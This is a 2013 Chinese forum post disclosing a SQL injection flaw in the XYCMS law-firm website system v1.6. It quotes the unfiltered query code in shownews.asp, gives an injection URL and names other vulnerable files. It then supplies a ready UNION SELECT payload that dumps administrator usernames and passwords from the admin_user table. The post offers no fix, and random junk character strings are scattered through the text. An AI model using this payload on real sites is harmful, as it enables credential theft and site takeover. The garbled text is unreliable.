前言:刚才蛋疼无聊下载了审计下,就稍微的看了下,漏洞太多。ps:跟有个投稿的板块文章有点类似
9 s' k2 V- h _6 g/ H* c! T) f) s 2 w5 ^# n7 R# G) _0 C1 T
淫荡分割线
! p2 K, i$ t1 {6 c--------------------------------------------------------
$ i7 {" H6 {1 H
; |" a, Q; M0 q审计版本:XYCMS律师事务所建站系统 v1.6(其他版本自测)
& n+ N+ p4 f" ]1 G源码地址:http://down.chinaz.com/soft/29233.htm% j' F6 q% i. t2 W
& W* M: o7 Y. ?: `- B+ F) b! C+ |: r2 f漏洞文件:shownews.asp
- u1 q8 Z+ o" ?& P3 {% i漏洞代码:7-13行
3 `" r5 P% l: y+ l ) F; D" {- [8 S. Q! c( }
5 o5 N3 j4 ]8 F: Z% Q4 H
<% 6 {. X* e; _& C" s& i, @
id=request.QueryString("id")0 Y! B5 L0 ? r
0 U, v$ m( g4 o
set snews=server.createobject("adodb.recordset")
% \& P1 h7 E9 Y3 E% ^# ]# x: pexec="select * from [news] where id="&id1 y# a% i* B7 M/ O
snews.open exec,conn,1,1
7 S4 A, E4 P I. Y9 G8 z! z%>
( }% D% H7 }/ G7 b
2 }5 \0 Z& E0 c* P & O! [2 l( D" S4 @7 P
什么过滤都没有 直造成注入1 s O2 g; \1 W9 H
# T! A7 x3 _! i& N* [注入点:http://127.0.0.1:99/shownews.asp?id=xx3 H/ ]. H; m) I3 k* X
, b! o# i: @( c: L, W
其余相同漏洞文件:showdxal.asp,showfwly.asp 等等自己找) q; w+ S5 s% s) k: Z l
l8 S t6 N9 h4 [1 t% p7 J( k
7 e0 m4 l/ A* Cexp: union select 1,admin,password,4,5,7 from admin_user
+ w9 D" H7 g7 d' J+ f/ l! f
/ ^* B1 p4 i! S8 Z' T. L7 F4 L" t |
发表于 2013-4-4 17:28:12
收藏
支持
反对